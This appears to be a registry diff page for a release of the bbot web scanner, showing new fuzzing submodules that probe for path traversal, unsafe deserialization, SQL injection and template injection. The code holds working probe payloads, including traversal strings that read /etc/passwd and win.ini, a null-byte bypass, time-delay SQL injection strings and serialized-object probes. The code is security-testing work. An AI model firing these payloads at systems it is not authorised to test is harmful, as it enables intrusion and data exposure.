bbot 2.4.2__py3-none-any.whl → 2.4.2.6590rc0__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of bbot might be problematic. Click here for more details.

Files changed (64) hide show
  1. bbot/__init__.py +1 -1
  2. bbot/core/event/base.py +64 -4
  3. bbot/core/helpers/diff.py +10 -7
  4. bbot/core/helpers/helper.py +5 -1
  5. bbot/core/helpers/misc.py +48 -11
  6. bbot/core/helpers/regex.py +4 -0
  7. bbot/core/helpers/regexes.py +45 -8
  8. bbot/core/helpers/url.py +21 -5
  9. bbot/core/helpers/web/client.py +25 -5
  10. bbot/core/helpers/web/engine.py +9 -1
  11. bbot/core/helpers/web/envelopes.py +352 -0
  12. bbot/core/helpers/web/web.py +10 -2
  13. bbot/core/helpers/yara_helper.py +50 -0
  14. bbot/core/modules.py +23 -7
  15. bbot/defaults.yml +26 -1
  16. bbot/modules/base.py +4 -2
  17. bbot/modules/{deadly/dastardly.py → dastardly.py} +1 -1
  18. bbot/modules/{deadly/ffuf.py → ffuf.py} +1 -1
  19. bbot/modules/ffuf_shortnames.py +1 -1
  20. bbot/modules/httpx.py +14 -0
  21. bbot/modules/hunt.py +24 -6
  22. bbot/modules/internal/aggregate.py +1 -0
  23. bbot/modules/internal/excavate.py +356 -197
  24. bbot/modules/lightfuzz/lightfuzz.py +203 -0
  25. bbot/modules/lightfuzz/submodules/__init__.py +0 -0
  26. bbot/modules/lightfuzz/submodules/base.py +312 -0
  27. bbot/modules/lightfuzz/submodules/cmdi.py +106 -0
  28. bbot/modules/lightfuzz/submodules/crypto.py +474 -0
  29. bbot/modules/lightfuzz/submodules/nosqli.py +183 -0
  30. bbot/modules/lightfuzz/submodules/path.py +154 -0
  31. bbot/modules/lightfuzz/submodules/serial.py +179 -0
  32. bbot/modules/lightfuzz/submodules/sqli.py +187 -0
  33. bbot/modules/lightfuzz/submodules/ssti.py +39 -0
  34. bbot/modules/lightfuzz/submodules/xss.py +191 -0
  35. bbot/modules/{deadly/nuclei.py → nuclei.py} +1 -1
  36. bbot/modules/paramminer_headers.py +2 -0
  37. bbot/modules/reflected_parameters.py +80 -0
  38. bbot/modules/{deadly/vhost.py → vhost.py} +2 -2
  39. bbot/presets/web/lightfuzz-heavy.yml +16 -0
  40. bbot/presets/web/lightfuzz-light.yml +20 -0
  41. bbot/presets/web/lightfuzz-medium.yml +14 -0
  42. bbot/presets/web/lightfuzz-superheavy.yml +13 -0
  43. bbot/presets/web/lightfuzz-xss.yml +21 -0
  44. bbot/presets/web/paramminer.yml +8 -5
  45. bbot/scanner/preset/args.py +26 -0
  46. bbot/scanner/scanner.py +6 -0
  47. bbot/test/test_step_1/test__module__tests.py +1 -1
  48. bbot/test/test_step_1/test_helpers.py +7 -0
  49. bbot/test/test_step_1/test_presets.py +2 -2
  50. bbot/test/test_step_1/test_web.py +20 -0
  51. bbot/test/test_step_1/test_web_envelopes.py +343 -0
  52. bbot/test/test_step_2/module_tests/test_module_excavate.py +404 -29
  53. bbot/test/test_step_2/module_tests/test_module_httpx.py +29 -0
  54. bbot/test/test_step_2/module_tests/test_module_hunt.py +18 -1
  55. bbot/test/test_step_2/module_tests/test_module_lightfuzz.py +1947 -0
  56. bbot/test/test_step_2/module_tests/test_module_paramminer_getparams.py +4 -1
  57. bbot/test/test_step_2/module_tests/test_module_paramminer_headers.py +46 -2
  58. bbot/test/test_step_2/module_tests/test_module_reflected_parameters.py +226 -0
  59. bbot/wordlists/paramminer_parameters.txt +0 -8
  60. {bbot-2.4.2.dist-info → bbot-2.4.2.6590rc0.dist-info}/METADATA +2 -1
  61. {bbot-2.4.2.dist-info → bbot-2.4.2.6590rc0.dist-info}/RECORD +64 -42
  62. {bbot-2.4.2.dist-info → bbot-2.4.2.6590rc0.dist-info}/LICENSE +0 -0
  63. {bbot-2.4.2.dist-info → bbot-2.4.2.6590rc0.dist-info}/WHEEL +0 -0
  64. {bbot-2.4.2.dist-info → bbot-2.4.2.6590rc0.dist-info}/entry_points.txt +0 -0
@@ -0,0 +1,154 @@
1
+ from .base import BaseLightfuzz
2
+ from bbot.errors import HttpCompareError
3
+
4
+ from urllib.parse import quote
5
+
6
+
7
+ class path(BaseLightfuzz):
8
+ """
9
+ Detects path traversal and local file inclusion vulnerabilities
10
+
11
+ Techniques:
12
+
13
+ * Relative Path Traversal:
14
+ - Tests various relative path traversal patterns (../, ./, .../, etc.)
15
+ - Uses multiple encoding variations (URL encoding, double encoding)
16
+ - Attempts various path validation bypass techniques
17
+
18
+ * Absolute Path Traversal:
19
+ - Tests absolute paths for Windows (c:\\windows\\win.ini)
20
+ - Tests absolute paths for Unix (/etc/passwd)
21
+ - Tests null byte injection for extension bypass (%00)
22
+
23
+ Results are validated using multiple confirmations and WAF response filtering to eliminate false positives.
24
+ """
25
+
26
+ friendly_name = "Path Traversal"
27
+
28
+ async def fuzz(self):
29
+ cookies = self.event.data.get("assigned_cookies", {})
30
+ probe_value = self.incoming_probe_value(populate_empty=False)
31
+ if not probe_value:
32
+ self.debug(
33
+ f"Path Traversal detection requires original value, aborting [{self.event.data['type']}] [{self.event.data['name']}]"
34
+ )
35
+ return
36
+
37
+ # Single dot traversal tolerance test
38
+ path_techniques = {
39
+ "single-dot traversal tolerance (no-encoding)": {
40
+ "singledot_payload": f"./a/../{probe_value}",
41
+ "doubledot_payload": f"../a/../{probe_value}",
42
+ },
43
+ "single-dot traversal tolerance (no-encoding, leading slash)": {
44
+ "singledot_payload": f"/./a/../{probe_value}",
45
+ "doubledot_payload": f"/../a/../{probe_value}",
46
+ },
47
+ "single-dot traversal tolerance (url-encoding)": {
48
+ "singledot_payload": quote(f"./a/../{probe_value}".encode(), safe=""),
49
+ "doubledot_payload": quote(f"../a/../{probe_value}".encode(), safe=""),
50
+ },
51
+ "single-dot traversal tolerance (url-encoding, leading slash)": {
52
+ "singledot_payload": quote(f"/./a/../{probe_value}".encode(), safe=""),
53
+ "doubledot_payload": quote(f"/../a/../{probe_value}".encode(), safe=""),
54
+ },
55
+ "single-dot traversal tolerance (non-recursive stripping)": {
56
+ "singledot_payload": f"...//a/....//{probe_value}",
57
+ "doubledot_payload": f"....//a/....//{probe_value}",
58
+ },
59
+ "single-dot traversal tolerance (non-recursive stripping, leading slash)": {
60
+ "singledot_payload": f"/...//a/....//{probe_value}",
61
+ "doubledot_payload": f"/....//a/....//{probe_value}",
62
+ },
63
+ "single-dot traversal tolerance (double url-encoding)": {
64
+ "singledot_payload": f".%252fa%252f..%252f{probe_value}",
65
+ "doubledot_payload": f"..%252fa%252f..%252f{probe_value}",
66
+ },
67
+ "single-dot traversal tolerance (double url-encoding, leading slash)": {
68
+ "singledot_payload": f"%252f.%252fa%252f..%252f{probe_value}",
69
+ "doubledot_payload": f"%252f..%252fa%252f..%252f{probe_value}",
70
+ },
71
+ }
72
+
73
+ compiled_regex = self.lightfuzz.helpers.re.compile(r"/(?:[\w-]+/)*[\w-]+\.\w+")
74
+ linux_path_regex = await self.lightfuzz.helpers.re.match(compiled_regex, probe_value)
75
+ if linux_path_regex is not None:
76
+ original_path_only = "/".join(probe_value.split("/")[:-1])
77
+ original_filename_only = probe_value.split("/")[-1]
78
+ # Some servers validate the start of the path, so we construct our payload with the original path and filename
79
+ path_techniques["single-dot traversal tolerance (start of path validation)"] = {
80
+ "singledot_payload": f"{original_path_only}/./{original_filename_only}",
81
+ "doubledot_payload": f"{original_path_only}/../{original_filename_only}",
82
+ }
83
+
84
+ for path_technique, payloads in path_techniques.items():
85
+ iterations = 5 # one failed detection is tolerated, as long as its not the first run
86
+ confirmations = 0
87
+ while iterations > 0:
88
+ try:
89
+ http_compare = self.compare_baseline(
90
+ self.event.data["type"], probe_value, cookies, skip_urlencoding=True
91
+ )
92
+ singledot_probe = await self.compare_probe(
93
+ http_compare,
94
+ self.event.data["type"],
95
+ payloads["singledot_payload"],
96
+ cookies,
97
+ skip_urlencoding=True,
98
+ )
99
+ doubledot_probe = await self.compare_probe(
100
+ http_compare,
101
+ self.event.data["type"],
102
+ payloads["doubledot_payload"],
103
+ cookies,
104
+ skip_urlencoding=True,
105
+ )
106
+ # if singledot_probe[0] is true, the response is the same as the baseline. This indicates adding a single dot did not break the functionality
107
+ # next, if doubledot_probe[0] is false, the response is different from the baseline. This further indicates that a real path is being manipulated
108
+ # if doubledot_probe[3] is not None, the response is not empty.
109
+ # if doubledot_probe[1] is not ["header"], the response is not JUST a header change.
110
+ # "The requested URL was rejected" is a very common WAF error message which appears on 200 OK response, confusing detections
111
+ if (
112
+ singledot_probe[0] is True
113
+ and doubledot_probe[0] is False
114
+ and doubledot_probe[3] is not None
115
+ and doubledot_probe[1] != ["header"]
116
+ and "The requested URL was rejected" not in doubledot_probe[3].text
117
+ ):
118
+ confirmations += 1
119
+ self.verbose(f"Got possible Path Traversal detection: [{str(confirmations)}] Confirmations")
120
+ # only report if we have 3 confirmations
121
+ if confirmations > 3:
122
+ self.results.append(
123
+ {
124
+ "type": "FINDING",
125
+ "description": f"POSSIBLE Path Traversal. {self.metadata()} Detection Method: [{path_technique}]",
126
+ }
127
+ )
128
+ # no need to report both techniques if they both work
129
+ break
130
+ except HttpCompareError as e:
131
+ iterations -= 1
132
+ self.debug(e)
133
+ continue
134
+
135
+ iterations -= 1
136
+ if confirmations == 0:
137
+ break
138
+
139
+ # Absolute path test, covering Windows and Linux
140
+ absolute_paths = {
141
+ r"c:\\windows\\win.ini": "; for 16-bit app support",
142
+ "/etc/passwd": "daemon:x:",
143
+ "../../../../../etc/passwd%00.png": "daemon:x:",
144
+ }
145
+
146
+ for path, trigger in absolute_paths.items():
147
+ r = await self.standard_probe(self.event.data["type"], cookies, path, skip_urlencoding=True)
148
+ if r and trigger in r.text:
149
+ self.results.append(
150
+ {
151
+ "type": "FINDING",
152
+ "description": f"POSSIBLE Path Traversal. {self.metadata()} Detection Method: [Absolute Path: {path}]",
153
+ }
154
+ )
@@ -0,0 +1,179 @@
1
+ from .base import BaseLightfuzz
2
+ from bbot.errors import HttpCompareError
3
+
4
+
5
+ class serial(BaseLightfuzz):
6
+ """Finds parameters where serialized objects might be being deserialized.
7
+ It starts by performing a baseline with a specially-crafted non-serialized payload, separated by type (base64, hex, php raw).
8
+ This is designed to coax out an error that's not related to the decoding process.
9
+
10
+ After performing the baseline (Which by design may contain an error), we check for two possible deserialization cases:
11
+
12
+ 1) Replacing the payload with a serialized object changes the status code to 200 (minus some string signatures to help prevent false positives)
13
+
14
+ 2) If the first case doesn't match, we check for a telltale error string like "java.io.optionaldataexception" in the response.
15
+ """
16
+
17
+ friendly_name = "Unsafe Deserialization"
18
+
19
+ # Class-level constants
20
+ CONTROL_PAYLOAD_HEX = "f56124208220432ec767646acd2e6c6bc9622a62c5656f2eeb616e2f"
21
+ CONTROL_PAYLOAD_BASE64 = "4Wt5fYx5Y3rELn5myS5oa996Ji7IZ28uwGdha4x6YmuMfG992CA="
22
+ CONTROL_PAYLOAD_PHP_RAW = "z:0:{}"
23
+
24
+ BASE64_SERIALIZATION_PAYLOADS = {
25
+ "php_base64": "YTowOnt9",
26
+ "java_base64": "rO0ABXNyABFqYXZhLmxhbmcuQm9vbGVhbs0gcoDVnPruAgABWgAFdmFsdWV4cAA=",
27
+ "java_base64_string_error": "rO0ABXQABHRlc3Q=",
28
+ "java_base64_OptionalDataException": "rO0ABXcEAAAAAAEAAAABc3IAEGphdmEudXRpbC5IYXNoTWFwAAAAAAAAAAECAAJMAARrZXkxYgABAAAAAAAAAAJ4cHcBAAAAB3QABHRlc3Q=",
29
+ "dotnet_base64": "AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==",
30
+ "ruby_base64": "BAh7BjoKbE1FAAVJsg==",
31
+ }
32
+
33
+ HEX_SERIALIZATION_PAYLOADS = {
34
+ "java_hex": "ACED00057372000E6A6176612E6C616E672E426F6F6C65616ECD207EC0D59CF6EE02000157000576616C7565787000",
35
+ "java_hex_OptionalDataException": "ACED0005737200106A6176612E7574696C2E486173684D617000000000000000012000014C00046B6579317A00010000000000000278707000000774000474657374",
36
+ "dotnet_hex": "0001000000ffffffff01000000000000000601000000076775737461766f0b",
37
+ }
38
+
39
+ PHP_RAW_SERIALIZATION_PAYLOADS = {
40
+ "php_raw": "a:0:{}",
41
+ }
42
+
43
+ SERIALIZATION_ERRORS = [
44
+ "invalid user",
45
+ "cannot cast java.lang.string",
46
+ "dump format error",
47
+ "java.io.optionaldataexception",
48
+ ]
49
+
50
+ GENERAL_ERRORS = [
51
+ "Internal Error",
52
+ "Internal Server Error",
53
+ "The requested URL was rejected",
54
+ ]
55
+
56
+ def is_possibly_serialized(self, value):
57
+ # Use the is_base64 method from BaseLightfuzz via self
58
+ if self.is_base64(value):
59
+ return True
60
+
61
+ # Use the is_hex method from BaseLightfuzz via self
62
+ if self.is_hex(value):
63
+ return True
64
+
65
+ # List of common PHP serialized data prefixes
66
+ php_serialized_prefixes = [
67
+ "a:", # Array
68
+ "O:", # Object
69
+ "s:", # String
70
+ "i:", # Integer
71
+ "d:", # Double
72
+ "b:", # Boolean
73
+ "N;", # Null
74
+ ]
75
+
76
+ # Check if the value starts with any of the PHP serialized prefixes
77
+ if any(value.startswith(prefix) for prefix in php_serialized_prefixes):
78
+ return True
79
+ return False
80
+
81
+ async def fuzz(self):
82
+ cookies = self.event.data.get("assigned_cookies", {})
83
+ control_payload_hex = self.CONTROL_PAYLOAD_HEX
84
+ control_payload_base64 = self.CONTROL_PAYLOAD_BASE64
85
+ control_payload_php_raw = self.CONTROL_PAYLOAD_PHP_RAW
86
+
87
+ base64_serialization_payloads = self.BASE64_SERIALIZATION_PAYLOADS
88
+ hex_serialization_payloads = self.HEX_SERIALIZATION_PAYLOADS
89
+ php_raw_serialization_payloads = self.PHP_RAW_SERIALIZATION_PAYLOADS
90
+
91
+ serialization_errors = self.SERIALIZATION_ERRORS
92
+ general_errors = self.GENERAL_ERRORS
93
+
94
+ probe_value = self.incoming_probe_value(populate_empty=False)
95
+ if probe_value:
96
+ if self.is_possibly_serialized(probe_value):
97
+ self.debug(
98
+ f"Existing value is not ruled out for being a serialized object, proceeding [{self.event.data['type']}] [{self.event.data['name']}]"
99
+ )
100
+ else:
101
+ self.debug(
102
+ f"The Serialization Submodule only operates when there is no original value, or when the original value could potentially be a serialized object, aborting [{self.event.data['type']}] [{self.event.data['name']}]"
103
+ )
104
+ return
105
+
106
+ try:
107
+ http_compare_hex = self.compare_baseline(self.event.data["type"], control_payload_hex, cookies)
108
+ http_compare_base64 = self.compare_baseline(self.event.data["type"], control_payload_base64, cookies)
109
+ http_compare_php_raw = self.compare_baseline(self.event.data["type"], control_payload_php_raw, cookies)
110
+ except HttpCompareError as e:
111
+ self.debug(f"HttpCompareError encountered: {e}")
112
+ return
113
+
114
+ # Proceed with payload probes
115
+ for payload_set, payload_baseline in [
116
+ (base64_serialization_payloads, http_compare_base64),
117
+ (hex_serialization_payloads, http_compare_hex),
118
+ (php_raw_serialization_payloads, http_compare_php_raw),
119
+ ]:
120
+ for type, payload in payload_set.items():
121
+ try:
122
+ matches_baseline, diff_reasons, reflection, response = await self.compare_probe(
123
+ payload_baseline, self.event.data["type"], payload, cookies
124
+ )
125
+ except HttpCompareError as e:
126
+ self.debug(f"HttpCompareError encountered: {e}")
127
+ continue
128
+
129
+ if matches_baseline:
130
+ self.debug(f"Payload {type} matches baseline, skipping")
131
+ continue
132
+
133
+ self.debug(f"Probe result for {type}: {response}")
134
+
135
+ status_code = getattr(response, "status_code", 0)
136
+ if status_code == 0:
137
+ continue
138
+
139
+ if diff_reasons == ["header"]:
140
+ self.debug(f"Only header diffs found for {type}, skipping")
141
+ continue
142
+
143
+ if status_code not in (200, 500):
144
+ self.debug(f"Status code {status_code} not in (200, 500), skipping")
145
+ continue
146
+
147
+ # if the status code changed to 200, and the response doesn't match our general error exclusions, we have a finding
148
+ self.debug(f"Potential finding detected for {type}, needs confirmation")
149
+ if (
150
+ status_code == 200
151
+ and "code" in diff_reasons
152
+ and not any(
153
+ error in response.text for error in general_errors
154
+ ) # ensure the 200 is not actually an error
155
+ ):
156
+ self.results.append(
157
+ {
158
+ "type": "FINDING",
159
+ "description": f"POSSIBLE Unsafe Deserialization. {self.metadata()} Technique: [Error Resolution] Serialization Payload: [{type}]",
160
+ }
161
+ )
162
+ # if the first case doesn't match, we check for a telltale error string like "java.io.optionaldataexception" in the response.
163
+ # but only if the response is a 500, or a 200 with a body diff
164
+ elif status_code == 500 or (status_code == 200 and diff_reasons == ["body"]):
165
+ self.debug(f"500 status code or body match for {type}")
166
+ for serialization_error in serialization_errors:
167
+ # check for the error string, but also ensure the error string isn't just always present in the response
168
+ if (
169
+ serialization_error in response.text.lower()
170
+ and serialization_error not in payload_baseline.baseline.text.lower()
171
+ ):
172
+ self.debug(f"Error string '{serialization_error}' found in response for {type}")
173
+ self.results.append(
174
+ {
175
+ "type": "FINDING",
176
+ "description": f"POSSIBLE Unsafe Deserialization. {self.metadata()} Technique: [Differential Error Analysis] Error-String: [{serialization_error}] Payload: [{type}]",
177
+ }
178
+ )
179
+ break
@@ -0,0 +1,187 @@
1
+ from .base import BaseLightfuzz
2
+ from bbot.errors import HttpCompareError
3
+
4
+ import statistics
5
+
6
+
7
+ class sqli(BaseLightfuzz):
8
+ """
9
+ Detects SQL injection vulnerabilities.
10
+
11
+ Techniques:
12
+
13
+ * Error-based Detection:
14
+ - Injects single quotes and observes error responses
15
+ - Tests quote escape sequence variations
16
+ - Matches against known SQL error patterns
17
+
18
+ * Time-based Blind Detection:
19
+ - Uses vendor-specific time delay payloads
20
+ - Confirms delays with statistical analysis
21
+ - Requires multiple confirmations to eliminate false positives
22
+ """
23
+
24
+ friendly_name = "SQL Injection"
25
+
26
+ expected_delay = 5
27
+ # These are common error strings that strongly indicate SQL injection
28
+ sqli_error_strings = [
29
+ "Unterminated string literal",
30
+ "Failed to parse string literal",
31
+ "error in your SQL syntax",
32
+ "syntax error at or near",
33
+ "Unknown column",
34
+ "unterminated quoted string",
35
+ "Unclosed quotation mark",
36
+ "Incorrect syntax near",
37
+ "SQL command not properly ended",
38
+ "string not properly terminated",
39
+ ]
40
+
41
+ def evaluate_delay(self, mean_baseline, measured_delay):
42
+ """
43
+ Evaluates if a measured delay falls within an expected range, indicating potential SQL injection.
44
+
45
+ Parameters:
46
+ - mean_baseline (float): The average baseline delay measured from non-injected requests.
47
+ - measured_delay (float): The delay measured from a potentially injected request.
48
+
49
+ Returns:
50
+ - bool: True if the measured delay is within the expected range or exactly twice the expected delay, otherwise False.
51
+
52
+ The function checks if the measured delay is within a margin of the expected delay or twice the expected delay,
53
+ accounting for cases where the injected statement might be executed twice.
54
+ """
55
+ margin = 1.5
56
+ if (
57
+ mean_baseline + self.expected_delay - margin
58
+ <= measured_delay
59
+ <= mean_baseline + self.expected_delay + margin
60
+ ):
61
+ return True
62
+ # check for exactly twice the delay, in case the statement gets placed in the query twice (a common occurrence)
63
+ elif (
64
+ mean_baseline + (self.expected_delay * 2) - margin
65
+ <= measured_delay
66
+ <= mean_baseline + (self.expected_delay * 2) + margin
67
+ ):
68
+ return True
69
+ else:
70
+ return False
71
+
72
+ async def fuzz(self):
73
+ cookies = self.event.data.get("assigned_cookies", {})
74
+ probe_value = self.incoming_probe_value(populate_empty=True)
75
+ http_compare = self.compare_baseline(
76
+ self.event.data["type"], probe_value, cookies, additional_params_populate_empty=True
77
+ )
78
+
79
+ try:
80
+ # send the with a single quote, and then another with two single quotes
81
+ single_quote = await self.compare_probe(
82
+ http_compare,
83
+ self.event.data["type"],
84
+ f"{probe_value}'",
85
+ cookies,
86
+ additional_params_populate_empty=True,
87
+ )
88
+ double_single_quote = await self.compare_probe(
89
+ http_compare,
90
+ self.event.data["type"],
91
+ f"{probe_value}''",
92
+ cookies,
93
+ additional_params_populate_empty=True,
94
+ )
95
+ # if the single quote probe response is different from the baseline
96
+ if single_quote[0] is False:
97
+ # check for common SQL error strings in the response
98
+ for sqli_error_string in self.sqli_error_strings:
99
+ if sqli_error_string.lower() in single_quote[3].text.lower():
100
+ self.results.append(
101
+ {
102
+ "type": "FINDING",
103
+ "description": f"Possible SQL Injection. {self.metadata()} Detection Method: [SQL Error Detection] Detected String: [{sqli_error_string}]",
104
+ }
105
+ )
106
+ break
107
+ # if both probes were successful (and had a response)
108
+ if single_quote[3] and double_single_quote[3]:
109
+ # Ensure none of the status codes are "429"
110
+ if (
111
+ single_quote[3].status_code != 429
112
+ and double_single_quote[3].status_code != 429
113
+ and http_compare.baseline.status_code != 429
114
+ ): # prevent false positives from rate limiting
115
+ # if the code changed in the single quote probe, and the code is NOT the same between that and the double single quote probe, SQL injection is indicated
116
+ if "code" in single_quote[1] and (
117
+ single_quote[3].status_code != double_single_quote[3].status_code
118
+ ):
119
+ self.results.append(
120
+ {
121
+ "type": "FINDING",
122
+ "description": f"Possible SQL Injection. {self.metadata()} Detection Method: [Single Quote/Two Single Quote, Code Change ({http_compare.baseline.status_code}->{single_quote[3].status_code}->{double_single_quote[3].status_code})]",
123
+ }
124
+ )
125
+ else:
126
+ self.debug("Failed to get responses for both single_quote and double_single_quote")
127
+ except HttpCompareError as e:
128
+ self.verbose(f"Encountered HttpCompareError Sending Compare Probe: {e}")
129
+
130
+ # These are common SQL injection payloads for inducing an intentional delay across several different SQL database types
131
+ standard_probe_strings = [
132
+ f"'||pg_sleep({str(self.expected_delay)})--", # postgres
133
+ f"1' AND (SLEEP({str(self.expected_delay)})) AND '", # mysql
134
+ f"' AND (SELECT FROM DBMS_LOCK.SLEEP({str(self.expected_delay)})) AND '1'='1" # oracle (not tested)
135
+ f"; WAITFOR DELAY '00:00:{str(self.expected_delay)}'--", # mssql (not tested)
136
+ ]
137
+
138
+ baseline_1 = await self.standard_probe(
139
+ self.event.data["type"], cookies, probe_value, additional_params_populate_empty=True
140
+ )
141
+ baseline_2 = await self.standard_probe(
142
+ self.event.data["type"], cookies, probe_value, additional_params_populate_empty=True
143
+ )
144
+
145
+ # get a baseline from two different probes. We will average them to establish a mean baseline
146
+ if baseline_1 and baseline_2:
147
+ baseline_1_delay = baseline_1.elapsed.total_seconds()
148
+ baseline_2_delay = baseline_2.elapsed.total_seconds()
149
+ mean_baseline = statistics.mean([baseline_1_delay, baseline_2_delay])
150
+
151
+ for p in standard_probe_strings:
152
+ confirmations = 0
153
+ for i in range(0, 3):
154
+ # send the probe 3 times, and check if the delay is within the detection threshold
155
+ r = await self.standard_probe(
156
+ self.event.data["type"],
157
+ cookies,
158
+ f"{probe_value}{p}",
159
+ additional_params_populate_empty=True,
160
+ timeout=20,
161
+ )
162
+ if not r:
163
+ self.debug("delay measure request failed")
164
+ break
165
+
166
+ d = r.elapsed.total_seconds()
167
+ self.debug(f"measured delay: {str(d)}")
168
+ if self.evaluate_delay(
169
+ mean_baseline, d
170
+ ): # decide if the delay is within the detection threshold and constitutes a successful sleep execution
171
+ confirmations += 1
172
+ self.debug(
173
+ f"{self.event.data['url']}:{self.event.data['name']}:{self.event.data['type']} Increasing confirmations, now: {str(confirmations)} "
174
+ )
175
+ else:
176
+ break
177
+
178
+ if confirmations == 3:
179
+ self.results.append(
180
+ {
181
+ "type": "FINDING",
182
+ "description": f"Possible Blind SQL Injection. {self.metadata()} Detection Method: [Delay Probe ({p})]",
183
+ }
184
+ )
185
+
186
+ else:
187
+ self.debug("Could not get baseline for time-delay tests")
@@ -0,0 +1,39 @@
1
+ from .base import BaseLightfuzz
2
+
3
+
4
+ class ssti(BaseLightfuzz):
5
+ """
6
+ Detects server-side template injection vulnerabilities.
7
+
8
+ Techniques:
9
+
10
+ * Arithmetic Evaluation:
11
+ - Injects encoded and unencoded multiplication expressions to detect evaluation
12
+ """
13
+
14
+ friendly_name = "Server-side Template Injection"
15
+
16
+ async def fuzz(self):
17
+ cookies = self.event.data.get("assigned_cookies", {})
18
+ # These are common SSTI payloads, each attempting to trigger an integer multiplication which would produce an expected value
19
+ ssti_probes = [
20
+ "<%25%3d%201337*1337%20%25>",
21
+ "<%= 1337*1337 %>",
22
+ "${1337*1337}",
23
+ "%24%7b1337*1337%7d",
24
+ "1,787{{z}},569",
25
+ ]
26
+ for probe_value in ssti_probes:
27
+ r = await self.standard_probe(
28
+ self.event.data["type"], cookies, probe_value, allow_redirects=True, skip_urlencoding=True
29
+ )
30
+
31
+ # look for the expected value in the response
32
+ if r and ("1787569" in r.text or "1,787,569" in r.text):
33
+ self.results.append(
34
+ {
35
+ "type": "FINDING",
36
+ "description": f"POSSIBLE Server-side Template Injection. {self.metadata()} Detection Method: [Integer Multiplication] Payload: [{probe_value}]",
37
+ }
38
+ )
39
+ break